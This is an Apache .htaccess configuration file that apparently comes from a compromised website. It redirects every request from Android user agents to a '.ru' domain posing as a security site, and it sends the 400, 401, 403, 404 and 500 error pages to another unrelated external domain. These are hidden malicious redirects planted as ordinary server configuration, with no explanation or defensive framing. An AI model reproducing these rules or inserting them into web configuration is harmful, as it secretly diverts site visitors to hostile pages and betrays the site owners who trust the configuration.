RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://androidsecuritydata.ru
ErrorDocument 400 http://nrfoxnws.com
ErrorDocument 401 http://nrfoxnws.com
ErrorDocument 403 http://nrfoxnws.com
ErrorDocument 404 http://nrfoxnws.com
ErrorDocument 500 http://nrfoxnws.com